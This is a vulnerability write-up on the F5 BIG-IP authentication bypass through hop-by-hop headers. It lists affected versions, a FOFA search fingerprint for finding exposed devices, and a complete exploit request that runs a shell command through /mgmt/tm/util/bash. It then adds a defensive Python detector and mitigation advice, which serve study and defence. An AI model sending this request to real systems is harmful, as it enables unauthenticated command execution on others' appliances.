Vulnerability principle

Hop-by-hop headers are consumed by the hop (proxy) that receives them and are not forwarded to the next hop. For example, with `Connection: close,abc`, the header `abc` is deleted from the original request while it is being forwarded. This behaviour can be abused for SSRF, authentication bypass and similar attacks. The cause of this vulnerability is `Connection: Keep-alive,X-F5-Auth-Token`: BIG-IP performs authentication in the frontend, and when the request is then forwarded to Jetty this header is removed, which bypasses authentication.

POST /xxx HTTP/1.1
Host:
Connection: close,abc
abc:

After processing this becomes

POST /xxx HTTP/1.1
Host:
Connection: close

Affected versions

- BIG-IP versions 16.1.0 to 16.1.2 (Patch released)
- BIG-IP versions 15.1.0 to 15.1.5 (Patch released)
- BIG-IP versions 14.1.0 to 14.1.4 (Patch released)
- BIG-IP versions 13.1.0 to 13.1.4 (Patch released)
- BIG-IP versions 12.1.0 to 12.1.6 (End of Support)
- BIG-IP versions 11.6.1 to 11.6.5 (End of Support)

FOFA fingerprint

title="BIG-IP®- Redirect"


Request packet

POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46

{
"command":"run",
"utilCmdArgs":"-c id"
}
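The following Python is an added example, not code from the original post or from F5. It models the hop-by-hop stripping described in the principle section (a proxy removing every header named in `Connection` before forwarding, which is why the backend sees `Authorization` but no `X-F5-Auth-Token`), and a check a defender can run over raw requests or access logs to flag a `Connection` header that names an authentication header, as in the packet above. The hostname, the placeholder token values and the list of sensitive header names are assumptions; the `abc` request reproduces the page's own illustration.

```python
# Added example: simulate hop-by-hop header stripping as a reverse proxy does
# it, and detect requests that try to declare an auth header as hop-by-hop.

# Connection options that a proxy keeps in the rewritten Connection header.
CONNECTION_OPTIONS = {"close", "keep-alive"}

# Header names defined as hop-by-hop by HTTP/1.1 itself.
STANDARD_HOP_BY_HOP = {
    "connection", "keep-alive", "proxy-authenticate", "proxy-authorization",
    "te", "trailer", "transfer-encoding", "upgrade",
}

# Assumption: headers that carry credentials and must never be listed in
# Connection by a client. Extend with your gateway's own auth headers.
SENSITIVE_HEADERS = {"x-f5-auth-token", "authorization", "cookie"}


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (request_line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def connection_tokens(headers):
    """Lower-cased tokens listed in the Connection header(s)."""
    tokens = set()
    for name, value in headers:
        if name.lower() == "connection":
            tokens.update(t.strip().lower() for t in value.split(",") if t.strip())
    return tokens


def strip_hop_by_hop(headers):
    """Simplified proxy behaviour: drop headers named in Connection and keep
    only real connection options (close / keep-alive) in Connection itself."""
    listed = connection_tokens(headers)
    forwarded = []
    for name, value in headers:
        lname = name.lower()
        if lname == "connection":
            kept = [t.strip() for t in value.split(",")
                    if t.strip().lower() in CONNECTION_OPTIONS]
            forwarded.append((name, ", ".join(kept)))
        elif lname in listed:
            continue  # hop-by-hop by declaration: never reaches the backend
        else:
            forwarded.append((name, value))
    return forwarded


def suspicious_connection_tokens(raw: str):
    """Connection tokens that are neither options nor standard hop-by-hop names."""
    _, headers, _ = parse_request(raw)
    return connection_tokens(headers) - CONNECTION_OPTIONS - STANDARD_HOP_BY_HOP


def auth_bypass_headers(raw: str):
    """Sorted list of sensitive headers the request tries to get stripped."""
    return sorted(suspicious_connection_tokens(raw) & SENSITIVE_HEADERS)


# Constructed sample requests (placeholder host and credential values).
SUSPECT_REQUEST = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Connection: Keep-Alive, X-F5-Auth-Token\r\n"
    "X-F5-Auth-Token: PLACEHOLDER\r\n"
    "Authorization: Basic PLACEHOLDER\r\n"
    "Content-Length: 2\r\n"
    "\r\n"
    "{}"
)
ABC_REQUEST = (
    "POST /xxx HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Connection: close,abc\r\n"
    "abc: 1\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: bigip.example.internal\r\n"
    "Connection: close\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in [("suspect", SUSPECT_REQUEST), ("abc", ABC_REQUEST), ("benign", BENIGN_REQUEST)]:
        _, headers, _ = parse_request(raw)
        print(label, "forwarded headers:", strip_hop_by_hop(headers))
        print(label, "auth headers marked hop-by-hop:", auth_bypass_headers(raw))
```

The mitigation follows from the same logic: the frontend should either refuse requests whose `Connection` header lists a token that is not a standard hop-by-hop name, or the backend should perform its own authentication instead of trusting that the frontend already did.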
